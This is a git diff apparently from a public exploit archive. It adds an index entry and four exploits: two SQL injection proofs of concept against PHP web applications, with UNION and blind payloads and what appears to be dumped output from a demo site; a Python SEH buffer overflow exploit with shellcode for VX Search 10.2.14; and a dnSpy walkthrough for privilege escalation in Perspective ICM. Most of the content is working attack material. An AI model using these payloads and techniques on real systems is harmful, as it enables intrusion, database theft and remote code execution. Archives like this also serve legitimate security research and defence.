diff --git a/exploits/php/webapps/43211.txt b/exploits/php/webapps/43211.txt new file mode 100644 index 000000000..180199d01 --- /dev/null +++ b/exploits/php/webapps/43211.txt @@ -0,0 +1,43 @@ +# # # # # +# Exploit Title: Techno - Portfolio Management Panel 1.0 - SQL Injection +# Dork: N/A +# Date: 02.12.2017 +# Vendor Homepage: https://codecanyon.net/user/engtechno +# Software Link: https://codecanyon.net/item/techno-portfolio-management-panel/20919551 +# Demo: http://dacy.esy.es/eng/ +# Version: 1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# http://localhost/[PATH]/single.php?id=[SQL] +# +# -14++/*!08888UNION*/(/*!08888SELECT*/0x283129,0x283229,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),0x283429,0x283529,0x283629,0x283729,(/*!08888SELECT*/+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+/*!08888FROM*/+INFORMATION_SCHEMA.TABLES+/*!08888WHERE*/+TABLE_SCHEMA=DATABASE()),0x283929,0x28313029,0x28313129,0x28313229,0x28313329)--+- +# +# Etc.. +# # # # # + + + +http://server/single.php?id=-14++/*!08888UNION*/(/*!08888SELECT*/0x283129,0x283229,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),0x283429,0x283529,0x283629,0x283729,(/*!08888SELECT*/+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+/*!08888FROM*/+INFORMATION_SCHEMA.TABLES+/*!08888WHERE*/+TABLE_SCHEMA=DATABASE()),0x283929,0x28313029,0x28313129,0x28313229,0x28313329)--+- + +u633631124_dacy@server : u633631124_dacy : 10.1.24-MariaDB + +(7)categories +feedback +messages +notes +portfolio +settings +uploads +users +wp_commentmeta +wp_comments +etc.... \ No newline at end of file diff --git a/exploits/php/webapps/43212.txt b/exploits/php/webapps/43212.txt new file mode 100644 index 000000000..841c61b17 --- /dev/null +++ b/exploits/php/webapps/43212.txt @@ -0,0 +1,62 @@ +# # # # # +# Exploit Title: Readymade Classifieds Script 1.0 - SQL Injection +# Dork: N/A +# Date: 02.12.2017 +# Vendor Homepage: http://www.scubez.net/ +# Software Link: http://www.posty.in/index.html +# Demo: http://www.posty.in/readymade-classifieds-demo.html +# Version: 1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# 1) +# +# http://localhost/[PATH]/listings.php?catid=[SQL] +# +# -1++/*!08888UNION*/((/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)))--+- +# +# Parameter: catid (GET) +# Type: boolean-based blind +# Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) +# Payload: catid=-7326' OR 9205=9205# +# +# Type: AND/OR time-based blind +# Title: MySQL >= 5.0.12 AND time-based blind +# Payload: catid=' AND SLEEP(5)-- tCbs +# +# 2) +# +# http://localhost/[PATH]/ads-details.php?ID=[SQL] +# +# -265++/*!08888UNION*/(/*!08888SELECT*/(1),CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),(20),(21),(22),(23),(24),(25),(26))--+- +# +# Parameter: ID (GET) +# Type: boolean-based blind +# Title: AND boolean-based blind - WHERE or HAVING clause +# Payload: ID=265 AND 4157=4157 +# +# Type: AND/OR time-based blind +# Title: MySQL >= 5.0.12 AND time-based blind +# Payload: ID=265 AND SLEEP(5) +# +# Type: UNION query +# Title: Generic UNION query (NULL) - 26 columns +# Payload: ID=-5939 UNION ALL SELECT NULL,NULL,CONCAT(0x716a626271,0x664f68565771437a5444554e794f547462774e65574f43616b767945464c416d524b646f48675a67,0x71787a7071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ZIaY +# +# Etc.. +# # # # # + + + + +http://server/listings.php?catid=-1++/*!08888UNION*/((/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)))--+- + +http://server/ads-details.php?ID=-265++/*!08888UNION*/(/*!08888SELECT*/(1),CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),(20),(21),(22),(23),(24),(25),(26))--+- \ No newline at end of file diff --git a/exploits/windows/remote/43209.py b/exploits/windows/remote/43209.py new file mode 100755 index 000000000..b75b41ffc --- /dev/null +++ b/exploits/windows/remote/43209.py @@ -0,0 +1,67 @@ +#!/usr/bin/python + + +print "*** VX Search Enterprise v10.2.14 Buffer Overflow (SEH) ***\n" + +# Exploit Title : VX Search Enterprise v10.2.14 Buffer Overflow (SEH) +# Discovery by : W01fier00t +# Twitter : @wolfieroot +# Discovery Date : 22/11/2017 +# Software Link : http://www.vxsearch.com/setups/vxsearchent_setup_v10.2.14.exe +# Tested Version : 10.2.14 +# Tested on OS : Windows 7 Home Edition sp1 +# You will need to enable web server for this to work. +# You will also need the Login to VX Search wepage, for this to work. + +import urllib +import urllib2 +import socket + +#Bad chars \x00\x0a\x0d +#Payload size: 351 bytes +shellcode = ( +"\xdd\xc6\xb8\x4a\xec\xd2\xea\xd9\x74\x24\xf4\x5d\x2b\xc9\xb1" +"\x52\x83\xc5\x04\x31\x45\x13\x03\x0f\xff\x30\x1f\x73\x17\x36" +"\xe0\x8b\xe8\x57\x68\x6e\xd9\x57\x0e\xfb\x4a\x68\x44\xa9\x66" +"\x03\x08\x59\xfc\x61\x85\x6e\xb5\xcc\xf3\x41\x46\x7c\xc7\xc0" +"\xc4\x7f\x14\x22\xf4\x4f\x69\x23\x31\xad\x80\x71\xea\xb9\x37" +"\x65\x9f\xf4\x8b\x0e\xd3\x19\x8c\xf3\xa4\x18\xbd\xa2\xbf\x42" +"\x1d\x45\x13\xff\x14\x5d\x70\x3a\xee\xd6\x42\xb0\xf1\x3e\x9b" +"\x39\x5d\x7f\x13\xc8\x9f\xb8\x94\x33\xea\xb0\xe6\xce\xed\x07" +"\x94\x14\x7b\x93\x3e\xde\xdb\x7f\xbe\x33\xbd\xf4\xcc\xf8\xc9" +"\x52\xd1\xff\x1e\xe9\xed\x74\xa1\x3d\x64\xce\x86\x99\x2c\x94" +"\xa7\xb8\x88\x7b\xd7\xda\x72\x23\x7d\x91\x9f\x30\x0c\xf8\xf7" +"\xf5\x3d\x02\x08\x92\x36\x71\x3a\x3d\xed\x1d\x76\xb6\x2b\xda" +"\x79\xed\x8c\x74\x84\x0e\xed\x5d\x43\x5a\xbd\xf5\x62\xe3\x56" +"\x05\x8a\x36\xf8\x55\x24\xe9\xb9\x05\x84\x59\x52\x4f\x0b\x85" +"\x42\x70\xc1\xae\xe9\x8b\x82\x10\x45\x93\x4a\xf9\x94\x93\x74" +"\x98\x11\x75\xe2\x4a\x74\x2e\x9b\xf3\xdd\xa4\x3a\xfb\xcb\xc1" +"\x7d\x77\xf8\x36\x33\x70\x75\x24\xa4\x70\xc0\x16\x63\x8e\xfe" +"\x3e\xef\x1d\x65\xbe\x66\x3e\x32\xe9\x2f\xf0\x4b\x7f\xc2\xab" +"\xe5\x9d\x1f\x2d\xcd\x25\xc4\x8e\xd0\xa4\x89\xab\xf6\xb6\x57" +"\x33\xb3\xe2\x07\x62\x6d\x5c\xee\xdc\xdf\x36\xb8\xb3\x89\xde" +"\x3d\xf8\x09\x98\x41\xd5\xff\x44\xf3\x80\xb9\x7b\x3c\x45\x4e" +"\x04\x20\xf5\xb1\xdf\xe0\x05\xf8\x7d\x40\x8e\xa5\x14\xd0\xd3" +"\x55\xc3\x17\xea\xd5\xe1\xe7\x09\xc5\x80\xe2\x56\x41\x79\x9f" +"\xc7\x24\x7d\x0c\xe7\x6c") + +#0x1001a136 : pop edi # pop esi # ret 0x04 | {PAGE_EXECUTE_READ} [libspp.dll] +cmdname = "\x90" *16 +cmdname += shellcode +cmdname += "A" * 157 +cmdname += "\xEB\x06" +cmdname += "B" *2 +cmdname += "\x36\xa1\x01\x10" + +print " [*] Sending payload!..." +url = 'http://127.0.0.1/add_command?sid=f3fdf2603e9ac8f518db9452fee62110' +values = {'command_name' : cmdname} +data = urllib.urlencode(values) +req = urllib2.Request(url, data) + +try: + response = urllib2.urlopen(req, timeout = 1) +except socket.timeout: + pass + +print " [*] DONE! :D\n" \ No newline at end of file diff --git a/exploits/windows/webapps/43210.txt b/exploits/windows/webapps/43210.txt new file mode 100644 index 000000000..ee7899496 --- /dev/null +++ b/exploits/windows/webapps/43210.txt @@ -0,0 +1,75 @@ +# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # ## # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # +# Exploit Title: Privilege Escalation - Perspective ICM Investigation & Case - 5.1.1.16 +# Date Reported to vendor: Jun 28, 2017 +# Date Accepted by vendor: Jun 11, 2017 +# Exploit Author: Konstantinos.alexiou@hotmail.com +# Vendor Homepage: www.resolver.com +# Version: Perspective ICM Investigation & Case - 5.1.1.16 +# Tested on: Windows 8.1 +# CVE: CVE-2017-11319 +# CVSS v2 Vector: (AV:A/AC:L/Au:S/C:C/I:C/A:P) +# CVSS v2 Score: 7.4 +# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # +According to Resolver site: CIS "investigations and case management software is an end-to-end, total solution for responding to, reporting on, +and investigating incidents" +====================================================Vulnerability description============================================================= +The CIS application permits tampering of users’ permission values which are loaded through the following methods inside the Perspective.data.dll +just after the initial authentication phase and before the graphical users’ interface is loaded: + - accessLevels() + - userEntityPrivs() + - userFieldPrivs() +The CIS thick client uses the aforementioned methods to set the users’ graphical interface, their permissions access level as well privilege access against +each GUI field which is retrieved from the database server just after the initial login phase. Due to insufficient validation methods and missing cross server +side checking mechanisms, unprivileged authenticated users are allowed to modify their access level permissions by tampering and modifying these values +thus gaining access to priveleged users actions. An unprivileged user is able by using a C# disassembling and debugging tool such as “dnspy” to tamper +these values and gain access on hidden and restricted privileged fields or enable hidden forms such as the “Administration” currently accessible only to the +“CIS Administrators” group. +======================================================== Proof of Concept ============================================================== + +1. Connect to the URL and click on the main button to initiate the installation of the ClickOnce CIS application. +The CIS application starts downloading various required files which are automatically saved under the following folder: +C:\Users\{Current Logged in User}\AppData\Local\Apps\2.0 + +2.When the download is finished the main executable “Perspective.exe” is initialized and loaded by the dfsvc.exe which is responsible to check if the application +is already installed and up to date. + +3. Close the application and open a disassembling and debugging tool such as dnspy. Use the menu “debugger” and choose the option “Debug an assembly”. +This will open a dialog box to choose an executable for debugging. +Navigate to the main executable “Perspective.exe” which is installed inside the following directory and press OK: +“C:\Users\{Current Logged in User}\AppData\Local\Apps\2.0\Data\{name}.WRL\{name}.AOQ\ pers..tive_f50e2c1eb6078f5b_0005.0001_c760ec4c4b1ffe6d\ +The debugger will stop at the main Entry Point of the application. + +4. Click “Continue” from the main menu of the application until the login form appears on the screen. + +5. When the login screen appears, navigate to the “DataHandle” class which is defined inside the “Prespective.data.dll” and should be already decompiled by the dnSpy. + +6. Insert breakpoints at the following functions inside the DataHandle Class: + - UserEntityPrivs + - UserFieldPrivs + - UserReportPrivs + +7. Login to the application with an unprivileged account and then click Continue from the main menu of the dnSpy. The debugger will stop on the first breakpoint at line +of the function UserEntityPrivs(). The “foreach” loop used inside these lines calls the UserEntityPrivs() function and sets the users’ allowed permissions against visible +screens and forms. Click on the Locals field at the bottom menu of the dnSpy and navigate to the entity “useEntityPrivs()” section. +It should be mentioned that the “Administration” menu is restricted only for members belonging to “CIS Administrator” role while the user ITSECAS1 has no access on it. + +8. To enable just the administration menu for an unprivileged user just press Continue until the EntityID “Administration” appears in the Locals screen of the dnSpy and +change the following values to true: + - AllowAdd + - AllowDelete + - AllowEdit + - AllowExecute + - AllowFullControl + - AllowMange + - AllowReadOnly + - AllowShare + - Visible + +9. Delete the breakpoints and press Continue until the main screen of the thick client appears on the screen. +While the user is assigned as “Global Head” the administration menu accessible only to the admin users appears on his screen. +This modification provide access rights to change the minimum Password length to 6 characters +Additionally, using the aforementioned technique it is possible to enable additional restricted and none visible screens for any unauthorized user. +It should be also be mentioned that using the same technique it was possible to change the users’ report privileges inside the last “foreach” loop. + +10. Finally, and just after the UserReportPrivs foreach loop finishes, we can modify the users’ global membership permissions before they are applied to his interface. +Finally it should be mentioned that it is possible to access any submenu on the administration menu and modify values with only exception to create a new user. \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 58c0fdf6b..480d2b5be 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -10786,7 +10786,7 @@ id,file,description,date,author,type,platform,port 11059,exploits/windows/remote/11059.html,"JcomBand toolbar on IE - ActiveX Buffer Overflow",2010-01-07,"germaya_x & D3V!L FUCKER",remote,windows, 11138,exploits/windows/remote/11138.c,"Apple iTunes 8.1.x - 'daap' Remote Buffer Overflow",2010-01-14,Simo36,remote,windows, 11151,exploits/windows/remote/11151.html,"Microsoft Internet Explorer - 'wshom.ocx' ActiveX Control Remote Code Execution",2010-01-16,"germaya_x & D3V!L FUCKER",remote,windows, -11167,exploits/windows/remote/11167.py,"Microsoft Internet Explorer 6 - Aurora",2010-01-17,"Ahmed Obied",remote,windows, +11167,exploits/windows/remote/11167.py,"Microsoft Internet Explorer 6 - 'Aurora' Memory Corruption (MS10-002)",2010-01-17,"Ahmed Obied",remote,windows, 11172,exploits/windows/remote/11172.html,"Adobe GetPlus get_atlcom 1.6.2.48 - ActiveX Remote Execution (PoC)",2010-01-17,superli,remote,windows, 11173,exploits/windows/remote/11173.txt,"Trend Micro Web-Deployment - ActiveX Remote Execution (PoC)",2010-01-17,superli,remote,windows, 11179,exploits/windows/remote/11179.rb,"EFS Software Easy Chat Server 2.2 - Remote Buffer Overflow",2010-01-18,"John Babio",remote,windows, @@ -15996,6 +15996,7 @@ id,file,description,date,author,type,platform,port 43195,exploits/windows/remote/43195.py,"HP iMC Plat 7.2 - Remote Code Execution",2017-11-28,"Chris Lyne",remote,windows, 43193,exploits/unix/remote/43193.rb,"pfSense - Authenticated Group Member Remote Command Execution (Metasploit)",2017-11-29,Metasploit,remote,unix,443 43198,exploits/windows/remote/43198.py,"HP iMC Plat 7.2 - Remote Code Execution (2)",2017-11-29,"Chris Lyne",remote,windows, +43209,exploits/windows/remote/43209.py,"VX Search 10.2.14 - 'command_name' Buffer Overflow",2017-12-05,W01fier00t,remote,windows,80 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php, @@ -38241,3 +38242,6 @@ id,file,description,date,author,type,platform,port 43203,exploits/php/webapps/43203.txt,"Jobs2Careers / Coroflot Clone - SQL Injection",2017-11-30,8bitsec,webapps,php, 43205,exploits/multiple/webapps/43205.txt,"MistServer 2.12 - Cross-Site Scripting",2017-12-01,hyp3rlinx,webapps,multiple, 43206,exploits/php/webapps/43206.txt,"Artica Web Proxy 3.06 - Remote Code Execution",2017-12-01,hyp3rlinx,webapps,php, +43210,exploits/windows/webapps/43210.txt,"Perspective ICM Investigation & Case 5.1.1.16 - Privilege Escalation",2017-12-05,"Konstantinos Alexiou",webapps,windows, +43211,exploits/php/webapps/43211.txt,"Techno Portfolio Management Panel - 'id' SQL Injection",2017-12-05,"Ihsan Sencan",webapps,php, +43212,exploits/php/webapps/43212.txt,"Readymade Classifieds Script 1.0 - SQL Injection",2017-12-05,"Ihsan Sencan",webapps,php,